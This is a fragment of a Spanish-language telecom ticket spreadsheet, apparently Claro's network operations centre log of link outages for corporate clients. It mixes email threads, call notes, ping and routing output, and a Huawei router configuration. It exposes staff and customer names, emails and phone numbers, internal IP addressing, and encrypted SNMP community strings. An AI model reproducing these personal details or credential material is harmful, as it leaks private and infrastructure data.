PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&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
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29158
ESTIMADO ENTERADO.
SE PROCEDE ENTONCES A COORDINAR LA VISITA PARA EL DÍA DE MAÑANA A LAS 12 PM PARA REALIZAR LA REVISIÓN DEL ENLACE.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE LE RESPONDE AL CLIENTE PARA QUE APOYE INDICANDO EL DIA Y HORA DE LA VISITA . SE LE INFORMA LA INTERMITENCIA ESTA DESDE LOS EQUIPOS UBICACIÓN EN EL SITIO DEL CLIENTE.
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 10:53
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&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
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29158
MUY BUEN DÍA ESTIMADO.
QUEREMOS REVISAR EL ROUTER Y CONEXIONES INTERNAS PARA PODER VERIFICAR EL INCONVENIENTE YA QUE DESDE ALLÍ ES DONDE SE OBSERVAN LA INTERMITENCIA. SOLICITAMOS SU APOYO PARA INDICAR EL DÍA Y HORA DE LA VISITA PARA PODER REVISAR EL ESTADO DE LOS EQUIPOS. QUEDAMOS ATENTOS A SUS COMENTARIOS PARA PODER APOYARLE A SOLVENTAR EL INCONVENIENTE.
SALUDOS</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN SIN RESPUESTA DEL CLIENTE
GESTION DE PERMISOS || CONTR0001286888OC || COCA COLA FEMSA DE COSTA RICA S.A</t>
  </si>
  <si>
    <t>SE MANDA CORREO NUEVAMENTE AL CLIENTE EN LA COLA DE CORREOS QUE YA CONTABA
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 15:32
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ARROYO ARIAS, WILBERTH GERARDO &lt;W.ARROYOARIAS@DXC.COM&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORON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29158
BUENA TARDE
ESTIMADO CLIENTE POR ESTE MEDIO SOLCITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS PARA PERSONAL TÉCNICO CON RESPECTO AL SERVICIO REPORTADO CON EL ID: CONTR0001286888OC,  UBICADO EN LIMON, GUÁPILES, 200 MTS NORTE DEL AEROPUERTO, AV CENTRAL.,  ADJUNTO DATOS DEL PERSONAL TÉCNICO, NOS PUDIERA INDICAR LA FECHA Y HORA PARA LA VISITA TÉCNICA
MICHAEL VALLADARES ID:  7150122
QUEDAMOS ATENTOS A SUS COMENTARIOS
¡SALUDOS CORDIALES!</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE EMANUEL, SE LE INDICA QUE SEGUN CORREO, LA TRAZA LLEGA HASTA LA IP 10.201.53.206, LA CUAL ES IP WAN DEL PRESENTE, CONTRATO  CONTR0001286888OC,  QUE CLIENTE SOLICITA SE LE ENVIE CORREO CON LA PRESENTE INFORMACION PARA VALIDAR SI EN DONDE SE ENCUNTRA EL SEGMENTO AL QUE SE REALIZA PING, PARA ELLO SOLICITA SE REALICE MEET CON PERSONAL EN CONJUNTO. SE VALIDA QUE IP A LA QUE REALIZA PING 10.124.10.1, NO SE OBSERVA CONFIGURADA EN LA VLAN DEL CLIENTE, POR LO QUE SERA NECESARIO VALIDAR EN DONDE SE ENCUNTRA.
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION RED LAN DEL CLIENTE/_/FEMSA_GUAPILES/PREV:2653487/
 IP VRF FORWARDING FEMSA_LITE
 IP ADDRESS 172.19.10.26 255.255.255.252
 DUPLEX FULL
 SPEED 1000</t>
  </si>
  <si>
    <t>SE LLAMA AL PR KEVIN DEL CID AL +506 2247 2143 ID 2001516373 ATIENDE EMMANUEL GONZALEZ DONDE COMENTA QUE CONTINUA LA AFECTACIÓN DONDE COMENTA QUE LAS CAÍDAS SON ESPORÁDICAS Y COMENTA QUE AL PARECER CLARO NO LO VALIDA Y SOLO ELLOS POR TAL RAZÓN HAY MOLESTIA POR PARTE DEL CLIENTE FINAL SE TRASLADA LA INFORMACIÓN CON EL GESTOR ALEJANDRO.NAVARRO AL 8126 ID 2001517969  INGRESA LA LLAMADA CON YESSENIA CALGUA Y NO RESPONDE DERIVA LA LLAMADA A DARWIN ESPAÑA NO RESPONDE E INGRESA A BUZÓN DE VOZ, SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 2001518625 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE NOS CONTACTEMOS A LA EXTENSIONES  7744 /  7752 / 7753 SE CONTACTO A LAS EXTENSIONES   7744  ID 2001518993 NO RESPONDE  SE LLAMA 7753  ID 2001519152 RESPONDE LUVYN SANDOVAL QUIEN BRINDARA EL APOYO,  SE DEJA CON EL PR EN LINEA. A LA ESPERA DE LOS AVANCES.</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA MAÑANA A LAS 21:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>###SE REALIZARON CAMBIOS EN EL RADWIN Y PARAMETROS A - 39 , NO SE OBSERVAN EVENTOS EN EL CPE , SE OBSERVA TODO CORRECTAMENTE A NIVEL FISICO Y LOGICO ##
SE REALIZO CONFERENCIA CON EL COMPAÑERO DE CAMPO TECNCIO NAVARRO +506 70701094 Y CLIENTE  +506 83798026. INDICA EL CLIENTE QUE SE LE DE 15  MINUTOS PARA VALIDAR EL ENLACE
3001140490
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4197
DURACIÓN: 0:02:54
ESTADO: CONECTADA
DETALLES: 4197
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 14/06/2022 13:51:26</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 15:04
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ASUNTO: RE: PRUEBAS DEL SERVICIO COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC || SD1129158
BUENAS TARDES APRECIABLE CLIENTE
LE COMENTAMOS QUE SE REALIZARON CAMBIOS DE PARÁMETROS EN EL ENLACE RADWIN,
EL ENLACE FÍSICAMENTE SE ENCUENTRA OK NO ES NECESARIO CAMBIO.
NO EXISTE INCONVENIENTE A NIVEL LÍNEA VISTA.
ADICIONAL NO SE OBSERVAN EVENTOS EN EL ROUTER.
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 14:55</t>
  </si>
  <si>
    <t>**SE LLAMA A CLEINTE KEVIN DEL CID 506 2247 2143 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001347036
**</t>
  </si>
  <si>
    <t>F4596226</t>
  </si>
  <si>
    <t>SIN SEÑAL DE FIBRA DE CTC NODO HACIA CTC CLIENTE || SE VALIDARA TEMA CON CLIENTE EN HORARIO HABIL..
     CTC UNION TECHNOLOGIES CO., LTD.      FRM220A-GSW/SNMP     VER.[1.063]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #03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3]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #03 &gt; FRM220A-1000EAS/X        [LOCAL] VER:[1.300-1.044-0.000-0.000]
&lt;&lt;&lt; LOCAL FIBER 1 SFP AND D/D FUNCTION &gt;&gt;&gt;
VENDOR NAME          [CTC UNION       ]
VENDOR PART NUMBER   [SFS-7020-WA-DD  ]
FIBER TYPE           [SINGLE]
WAVE LENGTH          [1310 KM]
WAVE LENGTH 2        [1550 KM]
LINK LENGTH          [20 KM]
TX POWER             [-7 DBM]
RX POWER             [-40 DBM]
RX SENSITIVITY       [-23 DBM]
TEMPERATURE          [30 ¿ ]
&lt;ESC&gt;:GO TO PREVIOUS MENU.
VLAN CLIENTE CREADA Y TAGUEADA
     CTC UNION TECHNOLOGIES CO., LTD.      FRM220A-GSW/SNMP     VER.[1.063]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #03 &gt; FRM220A-1000EAS/X        [LOCAL] VER:[1.300-1.044-0.000-0.000]
&lt;&lt; LOCAL STATIC VLAN TABLE CONFIGURATION &gt;&gt;
ITEM | VLAN ID |  PORT 1   |  PORT 2   |  PORT 3   |  PORT 4   |  PORT 5
 01  |   514   |    TAGGED |  UNMODIFY |  UNMODIFY |  UNMODIFY |    TAGGED
 02  |  3750   |    TAGGED |    TAGGED |  UNMODIFY |  UNMODIFY |    TAGGED
&lt;N&gt;&lt;PAGEDOWN&gt;:SHOW NEXT PAGE.
&lt;P&gt;&lt;PAGEUP&gt;  :SHOW PREVIOUS PAGE.
&lt;V&gt; :VLAN TABLE OPERATION.
&lt;R&gt; :RESET STATIC 802.1Q VLAN SETTINGS.
&lt;C&gt; :CLEAR STATIC 802.1Q VLAN TABLE.
&lt;ESC&gt;:GO TO PREVIOUS MENU.
SE VALIDA QUE IP DEL CTC NODO ES 10.105.38.114 Y SE ENCUENTRA OPERTIVO
&lt;QTZLGTXCN2D2B01B22EIM1&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE GESTION_CTC_UNION 10.105.38.114
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GESTION_CTC_UNION
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.105.38.114/32  DIRECT  0    0                 0.0.0.0         VLANIF239
&lt;QTZLGTXCN2D2B01B22EIM1&gt;PING -VPN-INSTANCE  GESTION_CTC_UNION 10.105.38.114
  PING 10.105.38.114: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.105.38.114: BYTES=56 SEQUENCE=1 TTL=64 TIME=3 MS
    REPLY FROM 10.105.38.114: BYTES=56 SEQUENCE=2 TTL=64 TIME=1 MS
    REPLY FROM 10.105.38.114: BYTES=56 SEQUENCE=3 TTL=64 TIME=1 MS
    REPLY FROM 10.105.38.114: BYTES=56 SEQUENCE=4 TTL=64 TIME=1 MS
    REPLY FROM 10.105.38.114: BYTES=56 SEQUENCE=5 TTL=64 TIME=1 MS
  --- 10.105.38.114 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/3 MS
&lt;QTZLGTXCN2D2B01B22EIM1&gt;</t>
  </si>
  <si>
    <t>F4596237</t>
  </si>
  <si>
    <t>SE HABLÓ CON EMILIO AGUILAR/CLIENTE 00 525551745299 SE LE PIDE APOYO CON TELS ADICIONALES DEL PR; INDICA QUE YA VE OK SERVICIO, SE LE PIDE CIERRE, LO AUTORIZA.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4318945 ::: TICKET CNOC IMDHE020721 ::: "LINK DOWN"</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 10:40
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; BRYAN STEVE PEREZ MENDOZA &lt;BRYANS.PEREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4318945 ::: TICKET CNOC IMDHE020721 ::: "LINK DOWN"
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4596281</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ASTRID  AL 31858250 SE BRINDA RETROALIMENTACION **
-ID 2001342818
**</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMADOS SE SOLICITA SU APOYO PARA PODER REALIZAR REVICION DE EQUIPOS YA QUE LA FIBRA ESTA UP PERO NO SE LLEGA AL CPE SE REALIZARON PRUEBAS CON EL CLIENTE Y NO LEVANTO INDICA QUE EL FORTINET TIENE UNA LUZ ROJA POR FAVOR ENVIAR PERSONAL MAÑANA APARTIR DE LAS 6:00 AM
FALLA: 		F4596281
NOMBRE DEL CLIENTE: 	KIELSA FARMACEUTICA GUATEMALA, SOCIEDAD ANONIMA	
UBICACIÓN: 		INTERNET_8 CALLE A 1-62 ZONA 1 MAZATENANGO SUCHITEPEQUEZ 
CONTACTO EN SITIO:	ASTRID  31858250	
HORARIO DE ATENCION:	6:00 AM  EL DIA 10/06/22	
GESTIÓN DE PERMISOS: 	LLEVAR SOLAMENTE IDENTIFICACION
ÚLTIMA MILLA:	    CTC-UNION FRM220A-01 MZTNGTMZN1D1103A05AHA0, 10.174.32.250 TARJETA 7 MODEM 1 (NODO) --&gt; F.O.--&gt; RAD ETX-1 MEDIA CONVERTER --&gt; FORTINET FG40F+LICENCIA BDL ROUTER (CLIENTE)
EQUIPO DE ACCESO (SW):	  SW CISCO ASR920 MZTNGTMZN2T1A13A05F8M11  10.72.36.52 PO5 (GI0/0/0,GI0/0/1) --&gt;
TIPO DE ENLACE:	FO / INTERNET	
PROBLEMA QUE REPORTA: 	CAIDA TOTAL SE REALIZA PRUEBAS DE 1ER NIVEL Y SE VALIDA QUE SE TIENE UP LA FIBRA OPTICA PERO SE ENCUENTRA CAIDO A NIVEL WAN
POSIBLE PROBLEMA DE DESCONFIGURACION DE EL EQUIPO FORTINET 	
ACCIONES A TOMAR:	FAVOR ENVIAR PERSONAL PARA REVISAR CISCO DONDE LLEGA LA FIBRA YA QUE EL PUERTO ESTA UP PERO A NIVEL WAN NO LEVANTA POSIBLE PROBLEMA DE CONFIGURACION  	
RED DE COBRE:		</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO NO SE ALCANZA A NIVEL WAN EL CPE SE PROCEDE A VALIDAR ULTIMA MILLA .
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_DEPTAL 10.103.82.9
  PING 10.103.82.9: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.82.9 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.103.82.9
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.103.82.0/27  DIRECT  0    0             D   10.103.82.1     VLANIF3750			</t>
  </si>
  <si>
    <t>F4596295</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE DE LA CENTRAL FRANKLIN ORELLANA 44990369 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001473217
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE DE LA CENTRAL FRANKLIN ORELLANA 44990369 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001449351
**</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE CNOC CLARO A LO DICHO EN CRONOS ANTERIORES, TIEMPO DE MONITOREO HA FINALIZADO; EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4596352</t>
  </si>
  <si>
    <t>PR FUERA DE HORARIO LABORAL; SE CONTINUARÁ SEGUIMIENTO DEL TICKET MAÑANA A PARTIR DE LAS 08:00AM. SE DEBE DETERMINAR ESTADO DE LOS EQUIPOS Y/O REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>F4596398</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE, SE VALIDA PERMISOS PARA PERSONAL TECNICO SE PROCEDE A APERTURAR FALLA
DE: SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 18:20
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SAN LORENZO  ID: 619364
BUENAS TARDES, FAVOR PROCEDER CON LA VISITA, YA SE INFORMO A LA TIENDA.
SALUDOS.</t>
  </si>
  <si>
    <t>***-- SE RESPONDE CORREO A CL Y SE LE RETROALIMENTA. --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 00:47
PARA: NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SAN LORENZO  ID: 619364
BUENOS DÍAS ESTIMADO SR. PEREZ.
                LAMENTAMOS LOS INCONVENIENTES, POR TEMAS DE HORARIO DE TIENDA NO SE PUDIERON FINALIZAR LOS TRABAJOS EN EL CABLEADO.
SE COORDINÓ CON EL ENCARGADO DE TIENDA Y SE RETOMARAN DE NUEVO A LAS 07:00 HRS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: NOE PEREZ (VENDOR) [MAILTO:NOE.PEREZ1@WALMART.COM]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 00:42
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SAN LORENZO  ID: 619364
BUENAS NOCHES,
FAVOR NOS PODRÍAN INDICAR SUS AVANCES
SALUDOS</t>
  </si>
  <si>
    <t>F4596399</t>
  </si>
  <si>
    <t>SE VALIDA EN CRONOLOGÍA DE LA FALLA QUE EL CLIENTE SOLICITA VISITA TÉCNICA POR TAL RAZÓN NO APLICA A PC SE PASA A WIP Y SE NOTIFICA AL GESTOR DARWINH.ESPANA VÍA SKYPE PARA QUE BRINDE EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>ENLACE AFECTADO POR CORTE DE FO EN SECTOR; PERSONAL TÉCNICO TRABAJANDO; ADICIONAL SE LLAMÓ/HABLÓ CON CARLOS LEMUS/CLIENTE 57154396 Y SE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL CARLOS LEMUS 57154396 INDICA QUE NO HAY NADIE EN SITIO QUE PUEDA REALIZAR PRUEBAS QUE LOS EQUIPOS ESTAN CONECTADOS INDICA QUE REMOTAMENTE NO LE PERMITE INGRESAR QUE AUN SE ENCUENTRA CAIDO EL SERVICIO Y SOLICITA VISITA TECNICA BRINDANDO LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: INDICA QUE CUALQUIER HORA  || SE NOTIFICA A GESTOR **
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: 9AV. 0-70 ZOAN 4 BARRIO EL PORVENIR POPTUN
ATENDERA EN SITIO: DIANA CASTELLANOS 59512250
-2001348065
**</t>
  </si>
  <si>
    <t>F4596406</t>
  </si>
  <si>
    <t>SE PROCEDE CON CIERRE POR PROBLEMAS DE ENERGIA COMERCIAL  EN EL CLIENTE
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN-INSTANCE TRANSFERENCIAS 10.218.50.157
  PING 10.218.50.157: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.50.157: BYTES=56 SEQUENCE=1 TTL=58 TIME=88 MS
    REPLY FROM 10.218.50.157: BYTES=56 SEQUENCE=2 TTL=58 TIME=85 MS
    REPLY FROM 10.218.50.157: BYTES=56 SEQUENCE=3 TTL=58 TIME=81 MS
    REPLY FROM 10.218.50.157: BYTES=56 SEQUENCE=4 TTL=58 TIME=86 MS
    REPLY FROM 10.218.50.157: BYTES=56 SEQUENCE=5 TTL=58 TIME=80 MS
  --- 10.218.50.157 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 8/8/80 MS</t>
  </si>
  <si>
    <t>F4596449</t>
  </si>
  <si>
    <t>***--- SE NOTIFICA A CNOC VÍA SKYPE QUE SE ASOCIA SD A INCIDENTE --**
COAL DE CORREO
ENLACE CAÍDO DE PALI SANTA CRUZ ID: CONTR0001487412OC</t>
  </si>
  <si>
    <t>F4596477</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL CLIENTE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 0 HORAS Y 5 MINUTOS)
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 5 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_0769&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_0769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6.244 0.0.0.3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R6EDVWPDO&gt;95*PYLB9\!~ZF\UHMD8Z).~8E)&amp;FYDNDIOV9X+P0'~982E'N'!%^%#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DESCRIPTION LAN DEL CLIENTE
#
INTERFACE ETHERNET0/0/0
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001542688OC/_/
 SET FLOW-STAT INTERVAL 30
#
INTERFACE GIGABITETHERNET0/0/0.1107
 DESCRIPTION PRIMARY LINK TO MTR105
 DOT1Q TERMINATION VID 1107
 IP ADDRESS 10.201.11.179 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2107
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2107
 IP ADDRESS 10.201.41.179 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 2048
 IP ADDRESS 22.32.6.245 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LAN DEL CLIENTE
 SHUTDOWN
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.101 255.255.255.255
#
BGP 64528
 ROUTER-ID 10.99.77.101
 PEER 10.201.11.129 AS-NUMBER 14754
 PEER 10.201.41.129 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.101 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.129 ENABLE
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.129 NEXT-HOP-LOCAL
  PEER 10.201.41.129 ENABLE
  PEER 10.201.41.129 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.6.244 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292C69
 SNMP-AGENT COMMUNITY READ %^%#&lt;R&amp;&gt;""O7QSHESL(HPLKSI\2;GI1-W9QANUMPQA\A!&lt;~I%Z"R(Z]GF\%BBRW'GP08V^PEDV;T}SNV&lt;#PK%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
